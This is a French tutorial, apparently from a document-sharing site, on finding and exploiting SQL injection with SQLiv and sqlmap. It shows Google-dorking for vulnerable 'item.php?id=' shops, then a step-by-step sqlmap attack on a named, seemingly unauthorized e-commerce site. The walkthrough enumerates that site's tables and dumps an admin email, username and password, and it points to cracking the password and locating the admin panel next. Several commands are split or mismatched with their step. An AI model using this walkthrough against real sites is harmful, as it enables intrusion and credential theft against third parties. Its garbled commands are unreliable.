SQL Injection

Télécharger au format docx, pdf ou txt
Télécharger au format docx, pdf ou txt
Vous êtes sur la page 1sur 7

SQL injection

A : OBJECTIF
L'objectif principal est d'améliorer la sécurité des données afin de les protéger
contre les accès non autorisés et les menaces potentielles provenant d'entités
externes, conformément aux meilleures pratiques et normes du secteur.

B : INSTALLER SQLIV SUR KALI LINUX


SQLiv est un outil de détection et d'exploitation des vulnérabilités d'injection
SQL dans une base de données d'un site web. Son utilisation à des fins non
autorisées ou malveillantes est illégale et contraire à l'éthique.

Tapez les commandes ci-dessous dans votre terminal pour installer SQLiv :

~ #git clone https://github.com/Hadesy2k/sqliv.git


~ #sqliv CD && sudo python2 setup.py -i

SQLiv sur Kali Linux (/usr/bin/sqliv) : scanner vulnérabilités SQL via 'sqliv'
dans le terminal, détecte et exploite les failles d'injection SQL de manière
éthique.

C : TROUVER LES VULNÉRABILITÉS D'INJECTION SQL


Google Dorking avec SQLiv pour détecter des vulnérabilités SQL sur des sites
e-commerce via le modèle d'URL « item.php?id= », explorez d'autres modèles
avec une recherche "google dork list".
~# sqliv -d inurl:item.php? identifiant = -e google -p 100

SQLiv explore par défaut la première page de Google, soit 10 sites, mais avec
l'argument -p 100, nous analysons 10 pages (100 sites). Avec l'exemple d'URL
donné, des résultats de vulnérabilités ont été obtenus.

D : SQL INJECTION USING SQLMAP

Après avoir identifié une cible vulnérable à l'injection SQL avec SQLiv, nous
utilisons SQLMap pour l'attaque. En commençant par révéler le nom de la base
de données, nous explorerons ensuite ses tables et colonnes pour extraire les
données.
URL cible : http://www.acfurniture.com/item.php?id=25

 ÉNUMÉRER LE NOM DE LA BASE DE DONNÉES :

Modèle de commande :

~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-


table --columns

Ainsi, la commande compilée ressemblerait à ceci :

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D
acfurniture -T paramètres --columns

Le résultat devrait ressembler à ceci :


Nous avons obtenu le nom de la base de données « acfurniture »
.

 ÉNUMÉRER LE NOM DES TABLES


Modèle de commande :

~# sqlmap -u « URL CIBLE » -D nom-base de données --tables

Ainsi, la commande compilée ressemble à ceci :

~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-table –


columns

Le résultat devrait ressembler à ceci :

Disposition des données sur acfurniture.com : Deux bases de données,


acfurniture et information_schema. La base acfurniture a quatre tables :
category, product, product_hacked et settings. En examinant le tableau des
paramètres, nous trouvons des colonnes et des données.
 ÉNUMÉRER LES COLONNES
Modèle de commande :

~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-table --


columns

Ainsi, la commande compilée ressemble à ceci :

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D ac
furniture -T paramètres --columns

Le résultat devrait ressembler à ceci :

Le tableau des paramètres se compose de 6 colonnes et il s'agit en fait d'un


compte d'identification. Vidons ces données.

E. VIDE DONNEES
Modèle de commande :

~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom -table -


C colonnes --dump
Ainsi, la commande compilée ressemble à ceci :

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurnit


ure -T paramètres -C nom d'utilisateur, mot de passe --dump

Ou vous pouvez également vider toutes les données de la table en utilisant la


commande :

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurnit


ure -T paramètres --dump

Le résultat devrait ressembler à ceci :

Email : [email protected]
Nom d'utilisateur : Handsome
Mot de passe : 9HPKO2NKrHbGmywzIzxUi

RESUME

En utilisant l'injection SQL avec SQLMap sur acfurniture.com, nous avons


réussi à extraire des données de deux bases de données, acfurniture et
information_schema. La base acfurniture contient des tables telles que category,
product, product_hacked et settings. Après avoir vidé des données, l'objectif
suivant est de trouver le panneau d'administration sur les sites cibles. Avant cela,
la nécessité de déchiffrer le mot de passe (9HPKO2NKrHbGmywzIzxUi) est
soulignée. Bien que cette démarche n'implique pas un piratage direct du site, elle
met en lumière des vulnérabilités potentielles et souligne l'importance de
renforcer la sécurité des bases de données pour prévenir de telles attaques,
souvent utilisées dans des contextes malveillants comme la recherche de
comptes de cartes de crédit sur des sites de commerce électronique.

Vous aimerez peut-être aussi